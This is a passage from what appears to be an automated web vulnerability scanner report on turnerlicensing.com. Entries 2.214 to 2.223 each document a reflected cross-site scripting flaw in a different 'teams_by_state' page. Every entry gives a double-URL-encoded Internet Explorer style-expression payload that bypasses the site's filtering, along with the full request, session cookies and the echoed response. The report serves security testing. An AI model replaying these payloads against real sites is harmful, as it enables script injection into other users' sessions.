Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: 1558098223:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=956
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54497


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nevada</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175385&ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1&ebfbe'style='x:expression(alert(1))'c4304c5bf67=1&ebfbe%27style%3d%27x%3aexpression%28alert%281%29%29%27c4304c5bf67=1&fromsla=T'>
...[SNIP]...

2.214. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Hampshire

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c49'style='x:expression(alert(1))'4d9b5eac50e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Hampshire?89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:17 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: 328760091:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54525


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Hampshire</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175387&89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1&fromsla=T&89c49'style='x:expression(alert(1))'4d9b5eac50e=1&89c49%27style%3d%27x%3aexpression%28alert%281%29%29%274d9b5eac50e=1'>
...[SNIP]...

2.215. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Jersey

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ebf4'style='x:expression(alert(1))'1fb26256c52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Jersey?3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:33 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1666357906:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=988
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110394


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Jersey</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175388&3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1&3ebf4%27style%3d%27x%3aexpression%28alert%281%29%29%271fb26256c52=1&3ebf4'style='x:expression(alert(1))'1fb26256c52=1&fromsla=T'>
...[SNIP]...

2.216. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Mexico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf719'style='x:expression(alert(1))'81128e78a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Mexico?bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1590876485:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=940
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110232


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Mexico</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175389&bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1&bf719'style='x:expression(alert(1))'81128e78a9f=1&bf719%27style%3d%27x%3aexpression%28alert%281%29%29%2781128e78a9f=1&fromsla=T'>
...[SNIP]...

2.217. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-York

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fed0'style='x:expression(alert(1))'69b8cb3cf13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-York?1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:35 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 334656480:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=996
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111485


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175390&1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1&1fed0'style='x:expression(alert(1))'69b8cb3cf13=1&1fed0%27style%3d%27x%3aexpression%28alert%281%29%29%2769b8cb3cf13=1&fromsla=T'>
...[SNIP]...

2.218. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/North-Carolina

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 650fc'style='x:expression(alert(1))'1f5f4cac11d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/North-Carolina?650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:33 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 226401215:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=939
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111006


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>North Carolina</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
nsing.com/s.nl?sc=77&category=175392&650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1&650fc%27style%3d%27x%3aexpression%28alert%281%29%29%271f5f4cac11d=1&fromsla=T&650fc'style='x:expression(alert(1))'1f5f4cac11d=1'>
...[SNIP]...

2.219. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/North-Dakota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fdb3'style='x:expression(alert(1))'d6800f7fe01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/North-Dakota?4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 772662588:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54521


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>North Dakota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175668&4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1&4fdb3'style='x:expression(alert(1))'d6800f7fe01=1&fromsla=T&4fdb3%27style%3d%27x%3aexpression%28alert%281%29%29%27d6800f7fe01=1'>
...[SNIP]...

2.220. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Ohio

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6304b'style='x:expression(alert(1))'d67f8a8edb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Ohio?6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772666872:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=956
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110948


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ohio</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175669&6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1&fromsla=T&6304b'style='x:expression(alert(1))'d67f8a8edb6=1&6304b%27style%3d%27x%3aexpression%28alert%281%29%29%27d67f8a8edb6=1'>
...[SNIP]...

2.221. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Oklahoma

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9598'style='x:expression(alert(1))'673ea07282e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Oklahoma?f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1222459890:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=934
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110378


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Oklahoma</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175670&f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1&f9598%27style%3d%27x%3aexpression%28alert%281%29%29%27673ea07282e=1&f9598'style='x:expression(alert(1))'673ea07282e=1&fromsla=T'>
...[SNIP]...

2.222. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Oregon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3239c'style='x:expression(alert(1))'0a7c4969562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Oregon?3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:38 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1146975289:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110334


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Oregon</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175671&3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1&3239c'style='x:expression(alert(1))'0a7c4969562=1&3239c%27style%3d%27x%3aexpression%28alert%281%29%29%270a7c4969562=1&fromsla=T'>
...[SNIP]...

2.223. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Ottawa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 885e7'style='x:expression(alert(1))'749e6052f63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

